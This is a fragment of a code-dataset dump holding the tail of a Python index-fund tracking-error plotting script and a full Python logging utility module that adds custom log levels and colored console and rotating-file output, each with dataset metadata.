BenchmarkIndex[MovingWindow:], 'k-')\nplt.plot(list(range(1, BackTesting + 1)), V_Tracking, 'k--')\nplt.legend([u'Benchmark index', u'Index fund'],\n loc='best', frameon=False, prop=jpfont)\nplt.xlabel(u'Investment period (years)', fontproperties=jpfont)\nplt.ylabel(u'Return (%)', fontproperties=jpfont)\nplt.xticks(list(range(12, BackTesting + 1, 12)),\n pd.date_range(R.index[MovingWindow], periods=BackTesting//12,\n freq='AS').year)\nplt.show()\n", "sub_path": "python/pyfin_min_tracking_error_ver1_1.py", "file_name": "pyfin_min_tracking_error_ver1_1.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.platform.startswith", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 34, "usage_type": "call"}, {"api_name": "cvxpy.sum_squares", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "cvxpy.ECOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": 
"pandas.date_range", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "9320961", "text": "\"\"\"\nUnicorn core.logutils module\nUnicorn module which provides common logging functions. \nIn order to initialize logger function init_logger should be used.\n\"\"\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport shutil\nimport re\nfrom datetime import datetime\nfrom threading import Lock\n\ntry:\n from core import logutils_conversions\n from core import environment_preparation\nexcept ImportError:\n import logutils_conversions\n import environment_preparation\n\ntry:\n import colorama\nexcept ImportError as e:\n colorama = None\nelse:\n colorama.init() \n\nloglock = Lock()\n \n# PATCHING CUSTOM LEVELS\nlogging.H1 = 99\nlogging.H2 = 98\nlogging.H3 = 97\nlogging.PLAIN = 29\nlogging.FRAME = 28\nlogging.TABLE = 27\nlogging.VERBOSE = 21\n\nlevel_styles = {}\nmessage_styles = {}\n\n\n\n# ==============================================================================\nclass EnhancedLogger(logging.getLoggerClass()):\n \"\"\"\n Logger class with additional methods / log levels.\n \"\"\"\n def __init__(self, name, level = logging.NOTSET):\n super().__init__(name, level)\n logging.addLevelName(logging.H1, \"H1\")\n logging.addLevelName(logging.H2, \"H2\")\n logging.addLevelName(logging.H3, \"H3\")\n logging.addLevelName(logging.TABLE, \"TABLE\")\n logging.addLevelName(logging.FRAME, \"FRAME\")\n logging.addLevelName(logging.PLAIN, \"PLAIN\")\n logging.addLevelName(logging.VERBOSE, \"VERBOSE\")\n \n def h1(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H1):\n msg = logutils_conversions._string_to_h1(msg)\n self._log(logging.H1, msg, args, **kwargs)\n \n def h2(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H2):\n msg = logutils_conversions._string_to_h2(msg)\n self._log(logging.H2, msg, args, **kwargs)\n \n def h3(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H3):\n msg = logutils_conversions._string_to_h3(msg)\n self._log(logging.H3, msg, args, **kwargs)\n \n def table(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.TABLE):\n msg = logutils_conversions._table_to_string(msg)\n self._log(logging.TABLE, msg, args, **kwargs)\n \n def frame(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.FRAME):\n msg = logutils_conversions._string_to_framed_string(msg)\n self._log(logging.FRAME, msg, args, **kwargs)\n \n def com(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def comment(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def plain(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def verbose(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.VERBOSE):\n msg = logutils_conversions._verbose_message_to_string(msg)\n self._log(logging.VERBOSE, msg, args, **kwargs)\n\n def configure(self, log_config={}, file=\"\"):\n \"\"\"\n Common function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. 
New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n\n # TODO function that initialize default values\n log_c = {\n \"log_fmt\": \"%(asctime)-16s - %(levelname)-8s - %(message)s\",\n \"log_path\": \"\",\n \"log_colors\": True,\n \"log_default_font\": \"\",\n \"log_default_back\": \"\",\n \"log_default_style\": \"\",\n \"log_debug_font\": \"white\",\n \"log_debug_back\": \"\",\n \"log_debug_style\": \"\",\n \"log_info_font\": \"green\",\n \"log_info_back\": \"\",\n \"log_info_style\": \"bright\",\n \"log_warning_font\": \"yellow\",\n \"log_warning_back\": \"\",\n \"log_warning_style\": \"bright\",\n \"log_error_font\": \"red\",\n \"log_error_back\": \"\",\n \"log_error_style\": \"bright\",\n \"log_critical_font\": \"white\",\n \"log_critical_back\": \"red\",\n \"log_critical_style\": \"bright\",\n \"log_header_font\": \"cyan\",\n \"log_header_back\": \"\",\n \"log_header_style\": \"bright\",\n \"log_verbose_font\": \"magenta\",\n \"log_verbose_back\": \"\",\n \"log_verbose_style\": \"bright\",\n \"log_strong_font\": \"yellow\",\n \"log_strong_back\": \"black\",\n \"log_strong_style\": \"\",\n \"log_send_font\": \"cyan\",\n \"log_send_back\": \"\",\n \"log_send_style\": \"bright\",\n \"log_receive_font\": \"yellow\",\n \"log_receive_back\": \"\",\n \"log_receive_style\": \"bright\",\n \"log_file_max_size\": \"0\",\n \"log_file_max_count\": \"0\",\n \"log_width\": 120,\n \"test_file\": \"\",\n \"file\": \"\" }\n log_c.update(log_config)\n logutils_conversions.LINE_WIDTH = log_c[\"log_width\"]\n if any(sub in str(log_c[\"log_colors\"]).lower() for sub in [\"1\", \"enable\", \"true\", \"yes\"]):\n log_c[\"log_colors\"] = True\n\n # TODO move to function close handlers\n handlers = self.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n self.removeHandler(hdlr)\n\n # TODO move to function set logging level, it would be good to use configuration parameter instead of directly parsing sys.argv\n if any(\"debug\" in ar.lower() for ar in sys.argv):\n level_to_set = logging.DEBUG\n else:\n level_to_set = logging.INFO\n self.setLevel(logging.DEBUG)\n self.propagate = 0\n\n # TODO move to function set formatter\n fmt = log_c[\"log_fmt\"]\n\n if colorama and log_c[\"log_colors\"] is True:\n handler = ColorStreamHandler(sys.stdout)\n cc_fmt = ColorFormatter(fmt)\n cc_fmt.configure(log_c)\n handler.setFormatter(cc_fmt)\n else:\n handler = logging.StreamHandler()\n c_fmt = CustomFormatter(fmt)\n handler.setFormatter(c_fmt)\n handler.setLevel(level_to_set)\n self.addHandler(handler)\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\")\n\n # TODO move to function set file handler\n log_dir_path = \"\"\n log_file_path = \"\"\n if log_c[\"log_path\"] and log_c[\"test_file\"]:\n log_dir_path = log_c[\"log_path\"]\n if os.path.isabs(log_dir_path): pass\n else: \n log_dir_path = os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\", log_dir_path))\n testname = os.path.basename(log_c[\"test_file\"])\n try:\n testname = os.path.splitext(testname)[0]\n except Exception as e:\n print(\"Could not remove extension from file named: {}. 
Skipping.\".format(testname))\n log_dir_name = \"{}_{}\".format(testname, timestamp)\n log_dir_path = os.path.realpath(os.path.join(log_c[\"log_path\"], log_dir_name))\n log_file_name = \"{}_{}_{}.log\".format(testname, timestamp, self.name)\n log_file_path = os.path.join(log_dir_path, log_file_name)\n elif file:\n log_dir_path = os.path.dirname(file)\n log_file_path = file\n if log_dir_path and not os.path.exists(log_dir_path):\n try:\n os.makedirs(log_dir_path)\n except Exception as ex:\n print(\"ERROR: Log directory {} could not be created\".format(log_dir_path))\n print(\n \"Please ensure that\\n\\t\\\"{}\\\"\\ndirectory exists or Unicorn has sufficient rights to create it.\".format(\n log_dir_path))\n raise ex from None\n\n if log_c[\"log_path\"] and file and os.path.isfile(file):\n shutil.copyfile(file, log_file_path)\n os.remove(file)\n\n if log_file_path:\n lfmc_text = str(log_c[\"log_file_max_size\"]).upper()\n lfmc_num = int(''.join(str(d) for d in [int(s) for s in list(lfmc_text) if s.isdigit()]))\n if lfmc_text.endswith(\"MB\") or lfmc_text.endswith(\"M\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024 * 1024\n elif lfmc_text.endswith(\"KB\") or lfmc_text.endswith(\"K\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024\n else:\n log_c[\"log_file_max_size\"] = lfmc_num\n if log_file_path:\n f_fmt = CustomFormatter(fmt)\n if log_c[\"log_file_max_size\"] > 0:\n from logging.handlers import RotatingFileHandler\n fh = RotatingFileHandler(log_file_path, maxBytes=log_c[\"log_file_max_size\"],\n backupCount=int(log_c[\"log_file_max_count\"]) )\n else:\n fh = logging.FileHandler(log_file_path)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(f_fmt)\n self.addHandler(fh)\n return self\n\n def close(self):\n \"\"\"\n Function to remove handlers and shut down the logger\n Args:\n logger (logger object)\n Returns:\n None\n \"\"\"\n try:\n handlers = self.handlers[:]\n for handler in handlers:\n handler.close()\n self.removeHandler(handler)\n del self\n except Exception as ex:\n pass \n\n\nclass ColorStreamHandler(logging.StreamHandler):\n \"\"\"\n StreamHandler with customized color output.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n def emit(self, record):\n try:\n loglock.acquire()\n message = self.format(record)\n self.stream.write(message)\n self.stream.write(getattr(self, 'terminator', '\\n'))\n self.flush()\n except (KeyboardInterrupt, SystemExit) as e:\n raise e\n except Exception:\n self.handleError(record)\n finally:\n loglock.release()\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"\n Formatter which selects modified log formats depending on the message LEVEL\n \"\"\"\n def __init__(self, fmt):\n self.general_fmt = \"%(asctime)-16s - %(levelname)-8s - %(message)s\"\n self.plain_fmt = \"%(asctime)-16s - %(message)s\"\n self.no_fmt = \"%(message)s\"\n # self.verbose_fmt = \"%(asctime)-16s - [ Logged from: %(module)s; line: %(lineno)d ]:\\n %(msg)s\"\n self.verbose_fmt = \"\\n %(msg)s\"\n if fmt: \n self.general_fmt = fmt\n super().__init__(fmt = self.general_fmt)\n\n def format(self, record, *args, **kwargs):\n new_record = copy.copy(record)\n format_orig = self._style._fmt\n if new_record.levelno == logging.DEBUG:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.INFO:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.WARNING or new_record.levelno == logging.WARN:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.ERROR or new_record.levelno == 
logging.CRITICAL:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.H1:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.H2:\n self._style._fmt = self.plain_fmt\n elif new_record.levelno == logging.H3:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.TABLE:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.FRAME:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.PLAIN:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.VERBOSE:\n self._style._fmt = self.verbose_fmt\n else:\n self._style._fmt = self.no_fmt\n result = logging.Formatter.format(self, new_record)\n self._style._fmt = format_orig\n return result\n\n\nclass ColorFormatter(CustomFormatter):\n \"\"\"\n Formatter which adds colors to messages going to the screen depending on message LEVEL\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.color_send = \"\"\n self.color_receive = \"\"\n self.color_strong = \"\"\n self.regex_send = re.compile(\"(.*?\\|.?\\-\\-\\>.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_receive = re.compile(\"(.*?\\|.?\\<\\-\\-.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_strong = re.compile(\"\\[(.*)\\]\", re.IGNORECASE | re.MULTILINE)\n\n def create_color_entry(self, colorama_assignments, style_name_lowercase):\n \"\"\"Method which assigns colorama style basing on global configuration stored in self.log_conf, \n styles dictionary colorama_dict and name of the style defined in style_name_lowercase\n self.log_conf - generated framework configuration for the logs (all parameters with log_ prefix) \n - taken from global config file, local config file, command line args and default settings.\n Args:\n colorama_assignments(dict) - assignments of logging level and colorama style\n style_name_lowercase(string) - value of configuration parameter. e.g. yellow\n Returns:\n colorama style(colorama attribute) - e.g. colorama.Style.BRIGHT\"\"\"\n try:\n log_param_value = self.log_conf[style_name_lowercase]\n except KeyError as e:\n log_param_value = \"\"\n try:\n return colorama_assignments[log_param_value]\n except (KeyError, Exception) as e:\n print(\"WARNING: Style or color name \\\"{}\\\" for {} was not recognized. 
Empty value will be used.\".format(log_param_value, style_name_lowercase))\n return \"\" \n \n def configure(self, log_conf):\n \"\"\"\n Method to set configuration of ColorFormatter from dictionary with log_ parameters.\n Args:\n log_conf(dictionary): configuration of the logger, keys are prefixed with log_\n Returns:\n None\n \"\"\"\n self.log_conf = log_conf\n self.level_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE\n }\n self.message_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE,\n logging.H1: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H2: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H3: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.VERBOSE: colorama.Style.BRIGHT + colorama.Fore.MAGENTA,\n logging.FRAME: \"\",\n logging.TABLE: \"\",\n logging.PLAIN: \"\"\n }\n self.colorama_styles = {\n \"bright\": colorama.Style.BRIGHT,\n \"dim\": colorama.Style.DIM,\n \"none\": \"\",\n \"\": \"\"\n } \n self.colorama_backgrounds = {\n \"red\": colorama.Back.RED,\n \"white\": colorama.Back.WHITE,\n \"green\": colorama.Back.GREEN,\n \"yellow\": colorama.Back.YELLOW,\n \"blue\": colorama.Back.BLUE,\n \"cyan\": colorama.Back.CYAN,\n \"magenta\": colorama.Back.MAGENTA,\n \"black\": colorama.Back.BLACK,\n \"\": \"\"\n } \n self.colorama_fonts = {\n \"red\": colorama.Fore.RED,\n \"white\": colorama.Fore.WHITE,\n \"green\": colorama.Fore.GREEN,\n \"yellow\": colorama.Fore.YELLOW,\n \"blue\": colorama.Fore.BLUE,\n \"cyan\": colorama.Fore.CYAN,\n \"magenta\": colorama.Fore.MAGENTA,\n \"black\": colorama.Fore.BLACK,\n \"\": \"\"\n }\n self.message_styles = {\n logging.DEBUG: self.create_color_entry(self.colorama_styles, \"log_debug_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_debug_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_debug_font\"),\n logging.INFO: self.create_color_entry(self.colorama_styles, \"log_info_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_info_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_info_font\"),\n logging.WARN: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.WARNING: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.ERROR: self.create_color_entry(self.colorama_styles, \"log_error_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_error_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_error_font\"),\n logging.CRITICAL: 
self.create_color_entry(self.colorama_styles, \"log_critical_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_critical_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_critical_font\"),\n logging.H1: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"),\n logging.H2: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.H3: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.VERBOSE: self.create_color_entry(self.colorama_styles, \"log_verbose_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_verbose_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_verbose_font\") \n }\n self.level_styles = dict(self.message_styles)\n self.color_send = self.create_color_entry(self.colorama_styles, \"log_send_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_send_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_send_font\")\n self.color_receive = self.create_color_entry(self.colorama_styles, \"log_receive_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_receive_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_receive_font\")\n self.color_strong = self.create_color_entry(self.colorama_styles, \"log_strong_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_strong_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_strong_font\")\n \n def _apply_special_styles(self, message):\n \"\"\"\n Method to apply special style to the message which matches expected format (based on regex search).\n It is called from \"format\" method\n It returns same message if no special match is found.\n Args:\n message (String): log entry to add the style\n Returns:\n message (String): colorized log entry\n \"\"\"\n if self.regex_send.search(message):\n return self.regex_send.sub(\"\\\\1\" + self.color_send + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_receive.search(message):\n return self.regex_receive.sub(\"\\\\1\" + self.color_receive + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_strong.search(message):\n return self.regex_strong.sub(self.color_strong + \"[\\\\1]\" + colorama.Style.RESET_ALL, str(message))\n else:\n return message\n\n def format(self, record, *args, **kwargs):\n \"\"\"\n Method to apply all color formats basing on self.level_styles and self.message_styles dictionaries.\n Args:\n record (String): log entry to add the style\n Returns:\n result (String): formatted log entry\n \"\"\" \n new_record = copy.copy(record) \n if isinstance(new_record.msg, str) and new_record.levelno == logging.PLAIN:\n new_record.msg = self._apply_special_styles(new_record.msg) \n if new_record.levelno in self.level_styles:\n new_record.levelname = \"{color_begin}{level}{color_end}\".format(\n color_begin = self.level_styles[new_record.levelno],\n level = new_record.levelname,\n color_end = colorama.Style.RESET_ALL,\n ) \n if new_record.levelno in self.message_styles:\n 
new_record.msg = \"{color_begin}{msg}{color_end}\".format(\n color_begin = self.message_styles[new_record.levelno],\n msg = new_record.msg,\n color_end = colorama.Style.RESET_ALL,\n )\n result = super(ColorFormatter, self).format(new_record, *args, **kwargs)\n return result\n\nlogging.setLoggerClass(EnhancedLogger)\n \n\ndef init_logger(name = \"log\", log_config = {}, file = \"\"): \n \"\"\"\n External function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n logger = logging.getLogger(name)\n logger.configure(log_config, file)\n return logger\n \n\nif __name__ == \"__main__\":\n\n logger = init_logger(\"test\")\n logger = init_logger(\"test\")\n\n logger.debug(\"This is a debug!\")\n logger.info(\"This is an info!\")\n logger.warning(\"This is a warning!\")\n logger.error(\"This is an error!\")\n logger.critical(\"This is a critical!\")\n\n logger.h1(\"1. Header\")\n logger.h2(\"1.1. Header\")\n logger.h3(\"1.1.1 Header\")\n\n logger.table([[\"Name\", \"Value\"],[1,2],[10,20],[30,40]])\n logger.com(\"Path [ AAA ] format\")\n logger.com(\"| --> D | Send format\")\n logger.com(\"| <-- D | Receive format\")\n logger.verbose([\n \"This is a long message\",\n \"which explains in details\",\n \"what is going on here\"\n ])\n logger.frame(\"Used for generic messages which should be emphasized\")\n logger.frame(\"Used for generic messages which should be emphasized\\n - like communication with the module\")\n logger.frame([\n \"Used for generic messages which should be emphasized\",\n \"- like communication with the module\"])\n try:\n i = 3/0\n except Exception as e:\n logger.verbose(\"You tried to do action which is not allowed. 
Handling exception.\")\n logger.info(\"[ c:\\\\temp ]\")\n", "sub_path": "unicorn_core/logutils.py", "file_name": "logutils.py", "file_ext": "py", "file_size_in_byte": 24390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 28, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLoggerClass", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.NOTSET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 55, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 57, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h1", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 64, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 67, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h2", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h3", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logutils_conversions._table_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 82, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_framed_string", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", 
"line_number": 88, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 96, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logutils_conversions._verbose_message_to_string", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logutils_conversions.LINE_WIDTH", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 169, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 170, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 172, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 185, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.isabs", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 239, 